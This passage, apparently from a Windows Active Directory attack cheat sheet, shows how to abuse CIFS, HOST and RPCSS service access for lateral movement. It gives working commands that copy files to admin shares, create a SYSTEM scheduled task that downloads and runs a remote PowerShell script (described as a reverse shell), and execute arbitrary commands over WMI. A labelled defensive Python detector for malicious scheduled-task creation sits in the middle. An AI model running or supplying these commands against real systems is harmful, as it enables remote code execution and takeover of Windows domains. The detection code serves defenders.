    dir \\vulnerable.computer\C$
    dir \\vulnerable.computer\ADMIN$
    copy afile.txt \\vulnerable.computer\C$\Windows\Temp
HOST
With this permission you can create scheduled tasks on remote computers and execute arbitrary commands:
    #Check you have permissions to use schtasks over a remote server
    schtasks /S some.vuln.pc
    #Create scheduled task, first for exe execution, second for powershell reverse shell download
    schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
    schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
    #Check it was successfully created
    schtasks /query /S some.vuln.pc
    #Run created schtask now
    schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
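A defender-side view of the scheduled-task commands above, as an added example that is not part of the original page: it correlates Security event 4698 (scheduled task created) with 4624 network logons and flags tasks that run as SYSTEM or carry a PowerShell download-and-execute action. The event dictionaries are constructed stand-ins for parsed log records, and the pattern list and the two-signal threshold are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b", re.I)

def task_xml(user, command, arguments=""):
    """Build a minimal Task Scheduler XML document (constructed test data)."""
    return (f'<Task xmlns="{NS["t"]}"><Principals><Principal><UserId>{user}</UserId>'
            f'</Principal></Principals><Actions><Exec><Command>{command}</Command>'
            f'<Arguments>{arguments}</Arguments></Exec></Actions></Task>')

# Constructed sample events (4624 = logon, 4698 = scheduled task created).
EVENTS = [
    {"EventID": 4624, "TargetLogonId": "0x5a1f3", "LogonType": 3, "IpAddress": "192.0.2.10"},
    {"EventID": 4624, "TargetLogonId": "0x1c2d4", "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4698, "SubjectLogonId": "0x5a1f3", "TaskName": "\\SomeTaskName",
     "TaskContent": task_xml("S-1-5-18", "powershell.exe",
                             "-c \"iex (New-Object Net.WebClient).DownloadString("
                             "'http://example.invalid/pc.ps1')\"")},
    {"EventID": 4698, "SubjectLogonId": "0x1c2d4", "TaskName": "\\NightlyBackup",
     "TaskContent": task_xml("CORP\\svc-backup", "C:\\Program Files\\Backup\\run.exe")},
]

def findings(events):
    """Return (task name, source address, reasons) for each suspicious 4698 event."""
    # Network logons (type 3) keyed by logon ID, to tie a task creation to a remote session.
    net_logons = {e["TargetLogonId"]: e["IpAddress"] for e in events
                  if e["EventID"] == 4624 and e["LogonType"] == 3}
    out = []
    for e in (e for e in events if e["EventID"] == 4698):
        root = ET.fromstring(e["TaskContent"])
        user = root.findtext("t:Principals/t:Principal/t:UserId", "", NS).strip().lower()
        cmds = [f'{x.findtext("t:Command", "", NS)} {x.findtext("t:Arguments", "", NS)}'
                for x in root.iterfind("t:Actions/t:Exec", NS)]
        reasons = []
        if e["SubjectLogonId"] in net_logons:
            reasons.append("created from a network logon session")
        if user in SYSTEM_IDS:
            reasons.append("runs as SYSTEM")
        if any(CRADLE.search(c) for c in cmds):
            reasons.append("action matches a PowerShell download-and-execute pattern")
        if len(reasons) >= 2:  # threshold is an assumption of this example
            out.append((e["TaskName"], net_logons.get(e["SubjectLogonId"]), reasons))
    return out

if __name__ == "__main__":
    for name, source, reasons in findings(EVENTS):
        print(name, source, "; ".join(reasons))
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled on the host.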
HOST + RPCSS
With these tickets you can execute WMI on the victim system:
    #Check you have enough privileges
    Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
    #Execute code
    Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
    #You can also use wmic
    wmic remote.computer.local list full /format:list